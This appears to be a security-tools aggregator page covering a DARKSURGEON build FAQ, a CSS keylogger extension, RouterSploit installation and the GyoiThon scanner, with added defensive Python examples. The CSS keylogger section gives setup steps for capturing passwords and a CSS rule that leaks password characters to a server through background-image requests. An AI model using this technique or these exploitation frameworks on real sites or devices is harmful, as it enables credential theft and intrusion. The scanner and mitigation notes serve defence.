DARKSURGEONIf you’d rather skip the process of building DARKSURGEON and want to trust the box file I’ve built, you can simply download it here.ContributingContributions, fixes, and improvements can be submitted directly against this project as a GitHub issue or pull request. 
Tools will be reviewed and added on a case-by-case basis.Frequently Asked QuestionsWhy is Hyper-V the preferred hypervisor?I strongly believe in the value of Windows Defender Device Guard and Virtualization Based Security, which require the usage of Hyper-V for optimal effectiveness. As a result, other Hypervisors are not recommended on the host machine. I will do my best to accomodate other mainline hypervisors, but I would encourage all users to try using Hyper-V.Why does the entire packer build fail on a chocolatey package error?This was a design decision that was made to guarantee that all packages which were expected made it into the final packer build. The upside of this decision is that it guarantees all expected tools will be available in the finalized product. The downside is that additional complexity and fragility are inserted the build pipeline, as transient or chocolatey errors may cause a build to fail.If you wish to ignore this functionality, you are free to modify the underlying script to ignore errors on package installation.Does this project support using a Chocolatey Professional/Business/Consultant license?Yes. If you add your license file (named chocolatey.license.xml) to the configuration-files directory when performing a packer build, it will automatically be imported by the Set-ChocolateySettings.ps1 script. Please ensure that your usage of a chocolatey license adheres to their End-User License Agreement.Why are the build functions broken into dozens of individual powershell scriptsFlexibility is key. You may opt to use — or not use — any of these scripts, and in any order. Having individual files, while increasing project complexity, ensures that the project can be completely customized without issue.I want to debug the build. How do I do so?Add the Set-Breakpoint.ps1 script into the provisioner process at the desired point. 
This will cause the packer build to halt for 4 hours as it waits for the script to complete.

Troubleshooting

The packer build process never starts and hangs on the UEFI screen.
This is most likely a timing issue caused by the emulated key presses not causing the image to boot from the mounted Windows ISO. Restart your VM and hit any key a few times until the build process starts.

Packer timed out during the build. I didn't receive an error.
Due to the size of the packages that are downloaded and installed, you may have exceeded the default packer build time limit.

My VM is running, but packer doesn't seem to connect via WinRM.
Connect to the guest and check the following:
- WinRM is accessible from your packer host (Test-NetConnection -ComputerName -Port 5985).
- WinRM is allowed on the guest firewall.

I keep getting anti-virus, checksum, or other issues with Chocolatey. What gives?
Unfortunately these packages can be a moving target. New updates can render the static checksum in the chocolatey package incorrect, anti-virus may mistakenly flag binaries, etc. Global chocolatey options can be specified to prevent these errors from occurring, but I will do my best to respond to bug reports filed as issues on the underlying chocolatey packages.

Download DARKSURGEON


CSS Keylogger – Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS

Chrome extension and Express server that exploits keylogging abilities of CSS.

To use

Setup Chrome extension
1. Download the repository: git clone <repository URL>
2. Open chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox; the menu's icon is three horizontal bars. Select Extensions under the More Tools menu to get to the same place).
3. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
4. Click Load unpacked extension... to pop up a file-selection dialog.
5. Select the css-keylogger-extension directory inside the repository you downloaded.

Setup Express server
    yarn
    yarn start

Haxking l33t passw0rds
1. Open a website that uses a controlled component framework such as React.
2. Click the extension's C icon at the top right of any webpage.
3. Type your password.
4. Your password should be captured by the express server.

How it works
This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following CSS will select all inputs with a type that equals password and a value that ends with "a". It will then try to load an image from http://localhost:3000/a.

    input[type="password"][value$="a"] {
      background-image: url("http://localhost:3000/a");
    }

Using a simple script one can create a CSS file that will send a custom request for every ASCII character.

Download CSS Keylogger
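The defender's side of the technique described above is to find stylesheets that key a resource fetch on the contents of a password field. The following is an added example, not code from the CSS Keylogger repository: it scans flat CSS for rules whose selector combines a password-input attribute selector with a substring selector on `value` and whose declarations contain a `url()`. The sample stylesheet, the `site_host` parameter and the function name `find_css_exfil_rules` are constructed for this example.

```python
import re
from urllib.parse import urlparse

# Constructed sample stylesheet (not from the post's repository): one ordinary
# password-field style, two rules of the shape the post describes, one decoy.
SAMPLE_CSS = """
input[type="password"] { border: 1px solid #ccc; background-image: url("/static/lock.png"); }
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }
input[type='password'][value^="pa"] { background-image: url("http://203.0.113.10/pa"); }
.hero { background-image: url("https://cdn.example.com/hero.jpg"); }
"""

# Flat `selector { declarations }` rules; nested at-rules are out of scope here.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
# Attribute selector targeting a password input.
PASSWORD_RE = re.compile(r"\[\s*type\s*=\s*['\"]?password['\"]?\s*\]", re.I)
# Selector on the live value attribute: value=, value^=, value$= or value*=.
VALUE_RE = re.compile(r"\[\s*value\s*([\^$*]?=)\s*['\"]?([^'\"\]]*)['\"]?\s*\]", re.I)
# Any url() the rule would fetch once the selector matches.
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.I)


def find_css_exfil_rules(css, site_host):
    """Flag rules that make a fetch conditional on the content of a password field.

    site_host is the origin serving the page; a fetch to any other host is
    marked external (the exfiltration channel the post describes).
    """
    findings = []
    for match in RULE_RE.finditer(css):
        selector, body = match.group(1).strip(), match.group(2)
        if not PASSWORD_RE.search(selector):
            continue
        value_match = VALUE_RE.search(selector)
        if value_match is None:
            continue  # styling the field is fine; keying on its value is not
        operator, fragment = value_match.groups()
        for url in URL_RE.findall(body):
            host = urlparse(url).hostname
            findings.append({
                "selector": selector,
                "operator": operator,
                "fragment": fragment,
                "url": url,
                "external": bool(host) and host != site_host,
            })
    return findings


if __name__ == "__main__":
    for f in find_css_exfil_rules(SAMPLE_CSS, "www.example.org"):
        print(f"{f['selector']} -> {f['url']} (value{f['operator']}{f['fragment']!r}, external={f['external']})")
```

Two mitigations follow from what the scanner looks for: the leak only exists when the framework mirrors the live input into the `value` attribute, so a controlled component that does not do that for password fields removes the selector's hook; and since background images are governed by the `img-src` directive of Content-Security-Policy, restricting `img-src` to trusted origins stops the fetch to the attacker's server even if the stylesheet is injected.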


RouterSploit v3.0 – Exploitation Framework For Embedded Devices

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of various modules that aid penetration testing operations:
- exploits: modules that take advantage of identified vulnerabilities
- creds: modules designed to test credentials against network services
- scanners: modules that check if a target is vulnerable to any exploit
- payloads: modules that are responsible for generating payloads for various architectures and injection points
- generic: modules that perform generic attacks

Installation

Requirements
Required: future, requests, paramiko, pysnmp, pycrypto
Optional: bluepy (Bluetooth Low Energy)

Installation on Kali Linux
    apt-get install python3-pip
    git clone <repository URL>
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py

Bluetooth Low Energy support:
    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

Installation on Ubuntu 18.04 & 17.10
    sudo add-apt-repository universe
    sudo apt-get install git python3-pip
    git clone <repository URL>
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py

Bluetooth Low Energy support:
    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

Installation on OSX
    git clone <repository URL>
    cd routersploit
    sudo python3 -m pip install -r requirements.txt
    python3 rsf.py

Running on Docker
    git clone <repository URL>
    cd routersploit
    docker build -t routersploit .
    docker run -it --rm routersploit

Update
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
    cd routersploit
    git pull

Download RouterSploit


GyoiThon – A Growing Penetration Test Tool Using Machine Learning

GyoiThon is a growing penetration test tool using Machine Learning.

GyoiThon identifies the software installed on the web server (OS, middleware, framework, CMS, etc.) based on the learning data. After that, it executes valid exploits for the identified software using Metasploit. Finally, it generates reports of the scan results. GyoiThon executes the above processing automatically.

Processing steps
GyoiThon executes the above "Step1" - "Step4" fully automatically. The user's only operation is to input the top URL of the target web server into GyoiThon. It is very easy! You can identify vulnerabilities of the web servers without taking time and effort.

Processing flow

Step 1. Gather HTTP responses.
GyoiThon gathers several HTTP responses of the target website while crawling. The following are examples of HTTP responses gathered by GyoiThon.

Example.1
    HTTP/1.1 200 OK
    Date: Tue, 06 Mar 2018 03:01:57 GMT
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Etag: "409ed-183-53c5f732641c0"
    Content-Length: 15271
    ...snip...

Example.2
    HTTP/1.1 200 OK
    Date: Tue, 06 Mar 2018 06:56:17 GMT
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;path=/;
    Content-Length: 37496
    ...snip...

Example.3
    HTTP/1.1 200 OK
    Date: Tue, 06 Mar 2018 04:19:19 GMT
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Content-Length: 11819
    ...snip...
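To make concrete how responses like the three above become input for a learning-based identifier, here is an added example (not GyoiThon's own code; the feature scheme is an assumption of this example, not a description of the tool's learning data). It parses a raw response, drops per-request headers, and reduces the remaining header values to their shape (hex and digit runs replaced by `h<len>`/`d<len>`), together with the header order. The three responses are copied from the post's examples with the bodies replaced by a constructed placeholder.

```python
import re
from textwrap import dedent

# The three responses shown in the post, with bodies replaced by a placeholder
# (constructed strings for this example; GyoiThon collects them by crawling).
EXAMPLES = [
    dedent("""\
        HTTP/1.1 200 OK
        Date: Tue, 06 Mar 2018 03:01:57 GMT
        Connection: close
        Content-Type: text/html; charset=UTF-8
        Etag: "409ed-183-53c5f732641c0"
        Content-Length: 15271

        <html>...</html>"""),
    dedent("""\
        HTTP/1.1 200 OK
        Date: Tue, 06 Mar 2018 06:56:17 GMT
        Connection: close
        Content-Type: text/html; charset=UTF-8
        Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;path=/;
        Content-Length: 37496

        <html>...</html>"""),
    dedent("""\
        HTTP/1.1 200 OK
        Date: Tue, 06 Mar 2018 04:19:19 GMT
        Connection: close
        Content-Type: text/html; charset=UTF-8
        Content-Length: 11819

        <html>...</html>"""),
]

# Headers whose value changes per request carry no software signal.
VOLATILE = {"date", "content-length"}
TOKEN_RE = re.compile(r"[A-Za-z0-9]+|[^A-Za-z0-9]")
HEX = set("0123456789abcdefABCDEF")


def parse_response(raw):
    """Split a raw response into (status code, [(name, value), ...], body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    status = lines[0].split()[1]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def shape(value):
    """Replace digit and hex runs by d<len>/h<len>; keep words and punctuation.

    '"409ed-183-53c5f732641c0"' becomes '"h5-d3-h13"'; a 32-hex cookie name and
    value become 'h32=h32;...'. Short words spelled only with a-f letters
    (e.g. 'cafe') are also classed as hex, which is acceptable noise here.
    """
    out = []
    for tok in TOKEN_RE.findall(value):
        if tok.isdigit():
            out.append("d%d" % len(tok))
        elif all(c in HEX for c in tok):
            out.append("h%d" % len(tok))
        elif tok.isalnum():
            out.append(tok.lower())
        else:
            out.append(tok)
    return "".join(out)


def extract_features(raw):
    """Turn one response into a dict of stable, software-indicative features."""
    status, headers, _ = parse_response(raw)
    feats = {
        "status": status,
        # Header order is fixed by the server software, so it is a feature too.
        "header-order": ",".join(name for name, _ in headers),
    }
    for name, value in headers:
        if name in VOLATILE:
            continue
        feats[name] = shape(value)
    return feats


if __name__ == "__main__":
    for i, raw in enumerate(EXAMPLES, 1):
        print("Example.%d" % i, extract_features(raw))
```

Run against your own server's responses, the same extractor shows which stable details (ETag format, session cookie naming, header order) a fingerprinting tool can learn from, which is the starting point for deciding what to normalise or strip.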